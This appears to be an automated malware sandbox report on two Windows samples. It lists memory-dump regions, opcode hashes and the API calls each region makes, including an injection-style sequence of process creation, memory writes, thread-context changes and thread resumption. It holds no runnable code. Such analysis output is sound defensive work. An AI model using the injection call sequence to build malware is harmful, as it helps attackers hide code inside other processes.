                                                                                • Opcode Fuzzy Hash: 21bd9c76e90a9e509ed5b6b471f277fa9853c6a06cb6ac4078a814b57be7915e
                                                                                • Instruction Fuzzy Hash: F4E10CB4E0425A8FCB14DFA9C5849AEFBB2FF89304F248169D415AB355D730AD42CFA1
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1870205941.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7660000_PZNfhfaj9O.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: c070d0fd5f308df211427647f3d91387e051e921d47e5da54de81f4302c36e8c
                                                                                • Instruction ID: 2351737aad7633f81921600dc90af0e40b96770f7e8cd7d72f7c885a1a0d4964
                                                                                • Opcode Fuzzy Hash: c070d0fd5f308df211427647f3d91387e051e921d47e5da54de81f4302c36e8c
                                                                                • Instruction Fuzzy Hash: CBD1273192075B8ACB15EB64D990ADDB7B1FFA5300F60D79AE0493B210FB706AC5CB91
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1865370174.0000000002CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2cd0000_PZNfhfaj9O.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 3e923fbe60ecc3227605de182bad3d958413577d90d01ac7ece10bebfe9ca354
                                                                                • Instruction ID: 7db0f94942d4b33a1735278ee5b323fad7f729344095b96c4c7818e6d6087eeb
                                                                                • Opcode Fuzzy Hash: 3e923fbe60ecc3227605de182bad3d958413577d90d01ac7ece10bebfe9ca354
                                                                                • Instruction Fuzzy Hash: 8CA15E36E002058FCF05DFB5C84459EB7B2FF85304B15856EEA06AB665DB71EA16CB80
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1870205941.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7660000_PZNfhfaj9O.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 37e963b69bd421acf6d17d5dab230cc895cf6daf44249ddd19e7776b280ab650
                                                                                • Instruction ID: 5accfd394c791760b433f1eadea445d69f95b3a9994542eec9bccbe7a1617a95
                                                                                • Opcode Fuzzy Hash: 37e963b69bd421acf6d17d5dab230cc895cf6daf44249ddd19e7776b280ab650
                                                                                • Instruction Fuzzy Hash: 81D1F83192075B8ACB15EB64D990ADDB7B1FFA5300F60D79AE0493B210FB706AC5CB91
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1870205941.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7660000_PZNfhfaj9O.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: d9b7f453b0964629658a3aba82c6aab25068a88fa0a6852aaa05e66b2348f57b
                                                                                • Instruction ID: 3fa6066344cd6f149a34d0d102f89fc574b2678726dae5f721f1e62096278004
                                                                                • Opcode Fuzzy Hash: d9b7f453b0964629658a3aba82c6aab25068a88fa0a6852aaa05e66b2348f57b
                                                                                • Instruction Fuzzy Hash: 25514EB4E0425A8FCB14DFA9C5845AEFBF2BF89300F24C16AD419A7316C7355942CFA1
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1870205941.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7660000_PZNfhfaj9O.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 0cb25285460b2078bb8ab74c61c9683b0d487fbd3f6bbb7b2aab14df69a07d3a
                                                                                • Instruction ID: bccb5a4dac6ba15588d45cbc705ba57978ac1e270cc6afff51cd71cfb86ee243
                                                                                • Opcode Fuzzy Hash: 0cb25285460b2078bb8ab74c61c9683b0d487fbd3f6bbb7b2aab14df69a07d3a
                                                                                • Instruction Fuzzy Hash: CB512EB5E042598FCB14CFA9C5845AEFBF2BF89304F24C16AD419A7315D730A946CFA1

                                                                                Execution Graph

                                                                                Execution Coverage:14.3%
                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                Signature Coverage:0%
                                                                                Total number of Nodes:36
                                                                                Total number of Limit Nodes:2
                                                                                APIs
                                                                                • LoadLibraryW.KERNEL32(00000000,?,?,?,?,00000000,00000E20,?,?,067D74A6), ref: 067D7656
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1986060031.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_67d0000_PZNfhfaj9O.jbxd
                                                                                Similarity
                                                                                • API ID: LibraryLoad
                                                                                • String ID:
                                                                                • API String ID: 1029625771-0
                                                                                • Opcode ID: 7dc9e37aada489c74584f129de33e2f49167597fbf427680186a61230091552e
                                                                                • Instruction ID: 051ef4e2646b60f8b9f69436bfd5b80e4f16ea828935c00965ce974184152409
                                                                                • Opcode Fuzzy Hash: 7dc9e37aada489c74584f129de33e2f49167597fbf427680186a61230091552e
                                                                                • Instruction Fuzzy Hash: E41126B5C002498FDB20DF9AC844ADEFBF9EF88320F14842AD419A7610D779A546CFA5
                                                                                APIs
                                                                                • LoadLibraryW.KERNEL32(00000000,?,?,?,?,00000000,00000E20,?,?,067D74A6), ref: 067D7656
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1986060031.00000000067D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067D0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_67d0000_PZNfhfaj9O.jbxd
                                                                                Similarity
                                                                                • API ID: LibraryLoad
                                                                                • String ID:
                                                                                • API String ID: 1029625771-0
                                                                                • Opcode ID: 721a2a859c4989b9bbba03df476c6ff75d3bfd86b187422facd23f4392466b48
                                                                                • Instruction ID: e9d8007980197f40880de5d6e8ff5beb4a79194f3c6415055896d86189367c4d
                                                                                • Opcode Fuzzy Hash: 721a2a859c4989b9bbba03df476c6ff75d3bfd86b187422facd23f4392466b48
                                                                                • Instruction Fuzzy Hash: A11123B5C007498FDB24DF9AC844A9EFBF4EF88220F14882AD419B7200E779A545CFA5
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1974667412.0000000001400000.00000040.00000800.00020000.00000000.sdmp, Offset: 01400000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1400000_PZNfhfaj9O.jbxd
                                                                                Similarity
                                                                                • API ID: ConsoleWindow
                                                                                • String ID:
                                                                                • API String ID: 2863861424-0
                                                                                • Opcode ID: 96325511d23e7571073ea51cb0b66938ca823ac1f9012fcf4be2595b0b4dff84
                                                                                • Instruction ID: 0ff8e16f1ea35274d1762768deb15e14ee2a4364bd0b1d96cc5e63dbd6049482
                                                                                • Opcode Fuzzy Hash: 96325511d23e7571073ea51cb0b66938ca823ac1f9012fcf4be2595b0b4dff84
                                                                                • Instruction Fuzzy Hash: B41158719003488FDB24DFAAC4457DEBBF4EF88324F20882AD019A7250CB39A941CFA4
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1974667412.0000000001400000.00000040.00000800.00020000.00000000.sdmp, Offset: 01400000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_1400000_PZNfhfaj9O.jbxd
                                                                                Similarity
                                                                                • API ID: ConsoleWindow
                                                                                • String ID:
                                                                                • API String ID: 2863861424-0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.1986172817.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6820000_PZNfhfaj9O.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: $tq$$tq$$tq$$tq$$tq$$tq$$tq$$tq
                                                                                • API String ID: 0-3970889292

                                                                                Execution Graph

                                                                                Execution Coverage:9.6%
                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                Signature Coverage:0%
                                                                                Total number of Nodes:175
                                                                                Total number of Limit Nodes:12

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0717B856
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.1968202486.0000000007170000.00000040.00000800.00020000.00000000.sdmp, Offset: 07170000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_7170000_CiENBY.jbxd
                                                                                Similarity
                                                                                • API ID: CreateProcess
                                                                                • String ID:
                                                                                • API String ID: 963392458-0
                                                                                • Opcode ID: ea00a4972ec57061cb7f46e4981dc88371544d6d1c647d16ab9e92d5f757c435
                                                                                • Instruction ID: 5a068be234dff0a7b8cdf44effa82e3252a758e38a4ee6445d4ab206feadae31
                                                                                • Opcode Fuzzy Hash: ea00a4972ec57061cb7f46e4981dc88371544d6d1c647d16ab9e92d5f757c435
                                                                                • Instruction Fuzzy Hash: 12A15BF1D0425ACFDB21DF68C841BEDBBB2BF48314F1485A9E858A7280DB749985CF91

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0717B856
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.1968202486.0000000007170000.00000040.00000800.00020000.00000000.sdmp, Offset: 07170000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_7170000_CiENBY.jbxd
                                                                                Similarity
                                                                                • API ID: CreateProcess
                                                                                • String ID:
                                                                                • API String ID: 963392458-0
                                                                                • Opcode ID: c312029999f1470ad74ed20ba943007a267b53ca3be349324d99b1871359f86c
                                                                                • Instruction ID: 6fd7a63d759a30bf0bce477e4fcec3cf3895a228043dc04b0d04b4dc41e8408f
                                                                                • Opcode Fuzzy Hash: c312029999f1470ad74ed20ba943007a267b53ca3be349324d99b1871359f86c
                                                                                • Instruction Fuzzy Hash: 44915BF1D0425ACFDB21DF68C841BEDBBB2BF48314F1485A9E858A7280DB749985CF91

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 02C8B01E
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.1957725778.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_2c80000_CiENBY.jbxd
                                                                                Similarity
                                                                                • API ID: HandleModule
                                                                                • String ID:
                                                                                • API String ID: 4139908857-0
                                                                                • Opcode ID: e6a34ea01777ddd9a8c4668eb3337382943c5584a6a307a765b5214a73c48897
                                                                                • Instruction ID: ca294274642f30cafaa6b9761307cf8bda56a7c9c81de62a1a39f7caf3cdce7c
                                                                                • Opcode Fuzzy Hash: e6a34ea01777ddd9a8c4668eb3337382943c5584a6a307a765b5214a73c48897
                                                                                • Instruction Fuzzy Hash: 67714870A00B458FDB24EF2AD44475ABBF1FF88308F00892ED48AD7A50D775E955CB91

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • CreateActCtxA.KERNEL32(?), ref: 02C859D1
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.1957725778.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_2c80000_CiENBY.jbxd
                                                                                Similarity
                                                                                • API ID: Create
                                                                                • String ID:
                                                                                • API String ID: 2289755597-0
                                                                                • Opcode ID: 9278f75ac85b57b00e7bbfddc82dad52827fa3c4e4d765b82700311315db1c8f
                                                                                • Instruction ID: 31c1e275239261865b93defad52a55f2dd5494188fb36fd6c925c1a0ddb3dc14
                                                                                • Opcode Fuzzy Hash: 9278f75ac85b57b00e7bbfddc82dad52827fa3c4e4d765b82700311315db1c8f
                                                                                • Instruction Fuzzy Hash: FB41D4B0C0061DCBDB24DFA9C885BDDBBF5BF44314F60805AD408AB255DBB56946CF90

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • CreateActCtxA.KERNEL32(?), ref: 02C859D1
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.1957725778.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_2c80000_CiENBY.jbxd
                                                                                Similarity
                                                                                • API ID: Create
                                                                                • String ID:
                                                                                • API String ID: 2289755597-0
                                                                                • Opcode ID: fdb8a5da09cf1736288628378180b29fffc035d9c26945c4ef96f3d10725a5af
                                                                                • Instruction ID: 8b410b92f635b249b9222fced8e4d900382b3fe5c244cb224bcd304816fe3e3c
                                                                                • Opcode Fuzzy Hash: fdb8a5da09cf1736288628378180b29fffc035d9c26945c4ef96f3d10725a5af
                                                                                • Instruction Fuzzy Hash: A74112B0C00659CFDB24DFA9C885BDDBBF5BF48308F20806AD408AB255DBB5694ACF50

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0717B428
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.1968202486.0000000007170000.00000040.00000800.00020000.00000000.sdmp, Offset: 07170000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_7170000_CiENBY.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryProcessWrite
                                                                                • String ID:
                                                                                • API String ID: 3559483778-0
                                                                                • Opcode ID: daa35904cf94ca0d156eaeab0a31713802321924cc0e02f064ed4d5f85873078
                                                                                • Instruction ID: 5e7399d964b04bd1e6e900d23bc246045e0bc75ebfb9d4bb5b44bf08084029a5
                                                                                • Opcode Fuzzy Hash: daa35904cf94ca0d156eaeab0a31713802321924cc0e02f064ed4d5f85873078
                                                                                • Instruction Fuzzy Hash: CE215AB59003599FCF10CFA9C981BEEBBF5FF48320F108429E959A7240D7799955CBA0

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02C8D666,?,?,?,?,?), ref: 02C8D727
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.1957725778.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_2c80000_CiENBY.jbxd
                                                                                Similarity
                                                                                • API ID: DuplicateHandle
                                                                                • String ID:
                                                                                • API String ID: 3793708945-0
                                                                                • Opcode ID: e7ac31d99706a6c7af2523e0be30bf6ee2d69f38f0b55987eab35c38b9cc619c
                                                                                • Instruction ID: ef8f3f4325c8d81805161cf2512630ef61f2e518ab44939627ba76d0b297e5a6
                                                                                • Opcode Fuzzy Hash: e7ac31d99706a6c7af2523e0be30bf6ee2d69f38f0b55987eab35c38b9cc619c
                                                                                • Instruction Fuzzy Hash: AD2168B5800249DFDB10CFA9D884ADEFFF4EF48320F24815AE954A7250D378A941CF61

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0717B508
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.1968202486.0000000007170000.00000040.00000800.00020000.00000000.sdmp, Offset: 07170000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_7170000_CiENBY.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryProcessRead
                                                                                • String ID:
                                                                                • API String ID: 1726664587-0
                                                                                • Opcode ID: 4fc3accf9b04b2985a8ad6c5e6bc7ca2a67291c3a9ad672dbe7c6c5deac2b6e0
                                                                                • Instruction ID: 97a75f145d337d7b88f266d9c038bec135b189694b3f9b1f145d4d08edcc4fa4
                                                                                • Opcode Fuzzy Hash: 4fc3accf9b04b2985a8ad6c5e6bc7ca2a67291c3a9ad672dbe7c6c5deac2b6e0
                                                                                • Instruction Fuzzy Hash: DC213BB18003499FCB10CFAAC845AEEFBF5FF48320F54842EE559A7250D7789941DB65

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0717B428
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.1968202486.0000000007170000.00000040.00000800.00020000.00000000.sdmp, Offset: 07170000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_7170000_CiENBY.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryProcessWrite
                                                                                • String ID:
                                                                                • API String ID: 3559483778-0
                                                                                • Opcode ID: 1f786c71c239c7330b456ccc2deaf6a2bdd0e6fdf92ff53bdd1a8fd9b56c4839
                                                                                • Instruction ID: 51ce16cc1c756d273113145e101e5b1f5114f0652823b8d0f1335f696576d082
                                                                                • Opcode Fuzzy Hash: 1f786c71c239c7330b456ccc2deaf6a2bdd0e6fdf92ff53bdd1a8fd9b56c4839
                                                                                • Instruction Fuzzy Hash: 6A2139B19003599FDF10CFAAC985BEEBBF5FF48320F148429E959A7240D7789940DBA4

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0717AE46
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.1968202486.0000000007170000.00000040.00000800.00020000.00000000.sdmp, Offset: 07170000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_7170000_CiENBY.jbxd
                                                                                Similarity
                                                                                • API ID: ContextThreadWow64
                                                                                • String ID:
                                                                                • API String ID: 983334009-0
                                                                                • Opcode ID: 87456f0b6c290a4887dbef19efb47adeccc256879d69e5b17e871abb564112b7
                                                                                • Instruction ID: e1416625eb53bcf8acfe10344cef60788275a887880a07cceb43f18055b61ea5
                                                                                • Opcode Fuzzy Hash: 87456f0b6c290a4887dbef19efb47adeccc256879d69e5b17e871abb564112b7
                                                                                • Instruction Fuzzy Hash: FD2137B19002099FDB10DFAAC4857EEBBF4EF88320F14842AD559B7280DB789945CFA5

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02C8D666,?,?,?,?,?), ref: 02C8D727
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.1957725778.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_2c80000_CiENBY.jbxd
                                                                                Similarity
                                                                                • API ID: DuplicateHandle
                                                                                • String ID:
                                                                                • API String ID: 3793708945-0
                                                                                APIs
                                                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0717B508
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.1968202486.0000000007170000.00000040.00000800.00020000.00000000.sdmp, Offset: 07170000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_7170000_CiENBY.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryProcessRead
                                                                                • String ID:
                                                                                • API String ID: 1726664587-0
                                                                                APIs
                                                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0717AE46
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.1968202486.0000000007170000.00000040.00000800.00020000.00000000.sdmp, Offset: 07170000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_7170000_CiENBY.jbxd
                                                                                Similarity
                                                                                • API ID: ContextThreadWow64
                                                                                • String ID:
                                                                                • API String ID: 983334009-0
                                                                                APIs
                                                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0717B346
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.1968202486.0000000007170000.00000040.00000800.00020000.00000000.sdmp, Offset: 07170000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_7170000_CiENBY.jbxd
                                                                                Similarity
                                                                                • API ID: AllocVirtual
                                                                                • String ID:
                                                                                • API String ID: 4275171209-0
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.1968202486.0000000007170000.00000040.00000800.00020000.00000000.sdmp, Offset: 07170000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_7170000_CiENBY.jbxd
                                                                                Similarity
                                                                                • API ID: ResumeThread
                                                                                • String ID:
                                                                                • API String ID: 947044025-0
                                                                                APIs
                                                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0717B346
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.1968202486.0000000007170000.00000040.00000800.00020000.00000000.sdmp, Offset: 07170000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_7170000_CiENBY.jbxd
                                                                                Similarity
                                                                                • API ID: AllocVirtual
                                                                                • String ID:
                                                                                • API String ID: 4275171209-0
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.1968202486.0000000007170000.00000040.00000800.00020000.00000000.sdmp, Offset: 07170000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_7170000_CiENBY.jbxd
                                                                                Similarity
                                                                                • API ID: ResumeThread
                                                                                • String ID:
                                                                                • API String ID: 947044025-0
                                                                                APIs
                                                                                • PostMessageW.USER32(?,00000010,00000000,?), ref: 0717ECD5
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.1968202486.0000000007170000.00000040.00000800.00020000.00000000.sdmp, Offset: 07170000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_7170000_CiENBY.jbxd
                                                                                Similarity
                                                                                • API ID: MessagePost
                                                                                • String ID:
                                                                                • API String ID: 410705778-0
                                                                                APIs
                                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 02C8B01E
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.1957725778.0000000002C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C80000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_2c80000_CiENBY.jbxd
                                                                                Similarity
                                                                                • API ID: HandleModule
                                                                                • String ID:
                                                                                • API String ID: 4139908857-0
                                                                                APIs
                                                                                • PostMessageW.USER32(?,00000010,00000000,?), ref: 0717ECD5
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.1968202486.0000000007170000.00000040.00000800.00020000.00000000.sdmp, Offset: 07170000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_7170000_CiENBY.jbxd
                                                                                Similarity
                                                                                • API ID: MessagePost
                                                                                • String ID:
                                                                                • API String ID: 410705778-0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.1969995107.000000000A9C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A9C0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_a9c0000_CiENBY.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: <
                                                                                • API String ID: 0-4251816714
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.1969995107.000000000A9C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A9C0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_a9c0000_CiENBY.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: <
                                                                                • API String ID: 0-4251816714
                                                                                • Instruction ID: 8cf852d3b0a6f7c3b4aea7444a5d5a95f45425e0d18a896890d99231b84582e1
                                                                                • Opcode Fuzzy Hash: ad4a55129c52b1e53fc65ac9d2b2dde5f1a49ec87af36656a5abc3e20d0de6ab
                                                                                • Instruction Fuzzy Hash: 5C01207101478499F7158B5ACC80776FFA8DF45320F19C899EE094E2C6C3789840C671
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.1957106441.00000000012DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012DD000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_12dd000_CiENBY.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 8c6b8fdb4a7ca48bb5617cadede0d49de2f422f2954b315d24202ea0139f3f48
                                                                                • Instruction ID: f08281f07d6c2f06e639323673ea3fd178839aca065ae106e452a5451d4b1d62
                                                                                • Opcode Fuzzy Hash: 8c6b8fdb4a7ca48bb5617cadede0d49de2f422f2954b315d24202ea0139f3f48
                                                                                • Instruction Fuzzy Hash: 92F0C831004784AEF7158A0ACC84B62FF98EF40634F15C45AEE084B286C3795844CA71

                                                                                Execution Graph

                                                                                Execution Coverage:14.7%
                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                Signature Coverage:0%
                                                                                Total number of Nodes:30
                                                                                Total number of Limit Nodes:1
                                                                                APIs
                                                                                • LoadLibraryW.KERNEL32(00000000,?,?,?,?,00000000,00000E20,?,?,061174A6), ref: 06117656
                                                                                Memory Dump Source
                                                                                • Source File: 00000012.00000002.2097616107.0000000006110000.00000040.00000800.00020000.00000000.sdmp, Offset: 06110000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_18_2_6110000_CiENBY.jbxd
                                                                                Similarity
                                                                                • API ID: LibraryLoad
                                                                                • String ID:
                                                                                • API String ID: 1029625771-0
                                                                                APIs
                                                                                • LoadLibraryW.KERNEL32(00000000,?,?,?,?,00000000,00000E20,?,?,061174A6), ref: 06117656
                                                                                Memory Dump Source
                                                                                • Source File: 00000012.00000002.2097616107.0000000006110000.00000040.00000800.00020000.00000000.sdmp, Offset: 06110000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_18_2_6110000_CiENBY.jbxd
                                                                                Similarity
                                                                                • API ID: LibraryLoad
                                                                                • String ID:
                                                                                • API String ID: 1029625771-0
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000012.00000002.2080747573.0000000002630000.00000040.00000800.00020000.00000000.sdmp, Offset: 02630000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_18_2_2630000_CiENBY.jbxd
                                                                                Similarity
                                                                                • API ID: ConsoleWindow
                                                                                • String ID:
                                                                                • API String ID: 2863861424-0
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000012.00000002.2080747573.0000000002630000.00000040.00000800.00020000.00000000.sdmp, Offset: 02630000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_18_2_2630000_CiENBY.jbxd
                                                                                Similarity
                                                                                • API ID: ConsoleWindow
                                                                                • String ID:
                                                                                • API String ID: 2863861424-0
                                                                                • Opcode ID: 19c0a36e6565f3b9ffb5b91d16cd09bf390f2e271a729dd4259db3a3c453e125
                                                                                • Instruction ID: 17634930d1987a9b4e2a3353110c6414803e205bc74c297d640466410d5a6bb9
                                                                                • Opcode Fuzzy Hash: 19c0a36e6565f3b9ffb5b91d16cd09bf390f2e271a729dd4259db3a3c453e125
                                                                                • Instruction Fuzzy Hash: 61113671D002498FDB20DFAAD44579FFBF8EB48324F148419C419A7240CB79A544CFA0
                                                                                Memory Dump Source
                                                                                • Source File: 00000012.00000002.2097754965.0000000006160000.00000040.00000800.00020000.00000000.sdmp, Offset: 06160000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_18_2_6160000_CiENBY.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 4ac2ba5d6d3bd8a715ae5d51b0bbda474f58cb757e521648a1d1ca02dfa84156
                                                                                • Instruction ID: 509e8e8a11a790361303e415269f270d6eadda39028533a799959b4ea27611ec
                                                                                • Opcode Fuzzy Hash: 4ac2ba5d6d3bd8a715ae5d51b0bbda474f58cb757e521648a1d1ca02dfa84156
                                                                                • Instruction Fuzzy Hash: E1C22D74B002189FDB64DF59C891EAEBBB6FF88700F508099E606AB361DB71AD41CF51
                                                                                Memory Dump Source
                                                                                • Source File: 00000012.00000002.2097754965.0000000006160000.00000040.00000800.00020000.00000000.sdmp, Offset: 06160000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_18_2_6160000_CiENBY.jbxd
                                                                                Similarity
                                                                                • API ID:
